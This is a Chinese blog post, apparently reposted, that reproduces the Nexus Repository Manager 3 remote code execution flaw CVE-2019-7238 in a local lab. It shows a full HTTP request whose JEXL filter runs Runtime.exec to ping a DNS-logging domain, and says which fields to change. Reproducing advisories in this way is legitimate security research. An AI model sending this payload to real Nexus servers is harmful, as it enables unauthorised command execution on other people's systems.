2. 程式人生 > >Nexus Repository Manager 3 RCE CVE-2019-7238

Nexus Repository Manager 3 RCE CVE-2019-7238

阿新 發佈:2019-02-18
tro erer sonatype oca clas requested repo prope ken

Nexus Repository Manager 3 RCE CVE-2019-7238

0x00 參考鏈接

https://support.sonatype.com/hc/en-us/articles/360017310793-CVE-2019-7238-Nexus-Repository-Manager-3-Missing-Access-Controls-and-Remote-Code-Execution-February-5th-2019

0x01 影響版本

Nexus Repository Manager OSS/Pro 3.6.2 版本到 3.14.0 版本

0x02 復現環境搭建

操作系統: windows 10
nexus版本:Nexus Repository Manager 3.14.0-04

下載鏈接:
https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3
nexus運行需要安裝jdk環境,而且jdk需要去oracle下載,openjdk不可以
技術分享圖片
下載完成後,解壓nexus,在nexus-3.14.0-04\bin,執行
nexus.exe /run
直接訪問localhost:8081 帳號密碼 admin/admin123

0x03漏洞復現

首先需要上傳一個資源,而真實環境則不需要,因為真實環境已經上傳了assert
技術分享圖片
然後訪問content selectors
技術分享圖片
抓包修改:

POST /service/extdirect HTTP/1.1
Host: localhost:8081
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost:8081/
X-Nexus-UI: true
NX-ANTI-CSRF-TOKEN: 2b482005-c1c3-48b6-942f-70e5a5f6d773
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 398
Cookie: pgv_pvi=5464665088; _ga=GA1.1.452998845.1550474860; _gid=GA1.1.653552585.1550474860; NX-ANTI-CSRF-TOKEN=2b482005-c1c3-48b6-942f-70e5a5f6d773; NXSESSIONID=7bd0f929-d72f-407a-bc17-76c2dd98c6cf
Connection: close

{"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"1.class.forName(‘java.lang.Runtime‘).getRuntime().exec(‘ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org‘)"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":11}

需要修改的點: {"property":"type","value":"jexl"}
"value":"1.class.forName(‘java.lang.Runtime‘).getRuntime().exec(‘ping t00ls.7272e87394b4f7c0088c966cba58c1dd.tu4.org‘)"
技術分享圖片

Nexus Repository Manager 3 RCE CVE-2019-7238

相關推薦

Nexus Repository Manager 3 RCE CVE-2019-7238

tro erer sonatype oca clas requested repo prope ken Nexus Repository Manager 3 RCE CVE-2019-7238 0x00 參考鏈接 https://support.sonatype.com/

Nexus Repository Manager 3(CVE-2019-7238) 遠程代碼執行漏洞分析和復現

下載鏈接 例子 conf bash 動態 本地 簡單的 article detail 0x00 漏洞背景 Nexus Repository Manager 3是一款軟件倉庫,可以用來存儲和分發Maven,NuGET等軟件源倉庫。其3.14.0及之前版本中,存在一處基於Or

[轉] 使用HTTPS在Nexus Repository Manager 3.0上搭建私有Docker倉庫

dha cau target article data- 重新啟動 crt main specified FROM: https://www.hifreud.com/2018/06/06/03-nexus-docker-repository-with-ssl/

如何安裝Nexus Repository Manager OSS 3.x,如何搭建管理Maven私服,win10、win7通用安裝詳解,附:錯誤解決方案。

        今天搭建一個Maven私服花了不少功夫,查閱了很多安裝的帖子以及百度了很多錯誤解決方案,然後將所有的帖子精華部分,附上我的經驗來帶給大家一個特別詳細的安裝方案,所以該文章大部分可以說是總結別人帖子。話不多說,開始安裝: 1.下載 &nb

Sonatype Nexus Repository Manager版本3.14.2訪問控制缺失及遠程代碼執行漏洞

class trie repo 新版 chm access tex ali live 發現被執行的程序在xmrig在 /var/tmp/目錄下 curl -o /var/tmp/xmrig http://202.144.193.159/xmrig;curl -o /

使用 Nexus Repository Manager 搭建私有docker倉庫

地址 reat 倉庫 dmi log sys systemctl 圖例 temp docker pull sonatype/nexus3 2.使用鏡像啟動一個容器: docker run -d --name nexus --restart=always -p 5000:5

Adobe ColdFusion RCE(CVE-2019-7839) 漏洞分析

作者: Badcode@知道創宇404實驗室 日期: 2019/07/09 原文連結:https://paper.seebug

搭建Nexus Repository 3.6.0-02和配置apache-maven-3.5.2和本地的local Repository以及專案的pom.xml(IDEA 打包等)

本文主要目的: 為了讓Maven管理專案的所有依賴包,Release和Snapshot . 本文涉及如下三點: 1.windows 下搭建Nexus Repository 3.6.0-02(linux下思路一樣) 2.配置apache-maven-3.5.2中的settin

Joomla 3.9.13 二次注入分析(CVE-2019-19846)

目錄 前言 分析 更好的注入 利用 總結 補丁分析 前言 這一個需要管理員許可權的二次SQL注入,利用起來比較雞肋。這裡僅分享一下挖洞時的思路,不

linux下安裝nexus repository及Intellij Idea集成私有maven

files usm codehaus ima sna rem 依賴 技術分享 active 前段日子公司搞java項目,使用nexus repository搭建了私有maven庫,現在把原來的私有nuget也遷到nexus repository上了,下面介紹下搭建流程:

Apple全系列緩衝區溢位核心RCE(CVE-2018-4407)poc

# CVE-2018-4407 ICMP DOS # https://lgtm.com/blog/apple_xnu_icmp_error_CVE-2018-4407 # from https://twitter.com/ihackbanme import sys try:    

Nexus Repository安裝和maven,npm配置(Linux)

Nexus Repository下載 根據作業系統選擇指定版本,本文針對Linux安裝,其他的安裝過程可能有所差異。 https://help.sonatype.com/repomanager3/download/download-archives---repository-manager-3 安裝

洛谷2019 3月月賽 2019.3.2

target 技術分享 com www. eight mba amp lan ont rank33 255pts 海星。 T1 T2 T3(留坑待補) T4洛谷2019 3月月賽 2019.3.2

Chrome 遠程代碼執行漏洞CVE-2019-5786-EXP

代碼執行 一個 art eas 避免 返回 class 參考 release 0x01 漏洞原理 CVE-2019-5786是位於FileReader中的UAF漏洞,由Google’s Threat Analysis Group的Clement Lecigne於2019-0

【獨家】K8S漏洞報告 | CVE-2019-1002101解讀

使用 ise 1.5 -- 更新 限制 二進制文件 兩個 需要 kubectl cp漏洞CVE-2019-1002101分析 Kube-proxy IPVS添加flag ipvs-strict-arp 近期bug fix數據分析 ——本期更新內容 kubectl cp漏洞

Confluence 目錄穿越漏洞導致代碼執行CVE-2019-3398

bfc str shell getconf 漏洞復現 nload 版本 跟蹤 nal 0x00 漏洞詳情 Confluence Server和Data Center產品在downloadallattachments資源中存在一個路徑穿越漏洞。有權向頁面和(或)博客添加附件,

WebLogic CVE-2019-2647、CVE-2019-2648、CVE-2019-2649

[] 正常的 endpoint 壓縮 bbc load 常見 stream 參考 @xxlegend在《Weblogic CVE-2019-2647等相關XXE漏洞分析》分析了其中的一個XXE漏洞點,並給出了PoC。剛入手java不久,本著學習的目的,自己嘗試分析了其他幾個

CVE-2019-0708 RDP 遠端桌面漏洞 可導致伺服器被黑

Windows系列伺服器於2019年5月15號,被爆出高危漏洞,該漏洞影響範圍較廣,windows2003、windows2008

CVE-2019-0708 BlueKeep的掃描和打補丁

簡介 CVE-2019-0708 BlueKeep是一個Windows遠端桌面服務的遠端程式碼執行漏洞,其危害程度不亞於CVE-

CVE-2019-11244漏洞到底該如何修復?--關於快取檔案許可權設定

我們團隊開發的產品基於Kubernetes,雖然Kubernetes已經非常安全,但我們產品有更高的安全要求,所以常常需要對Kub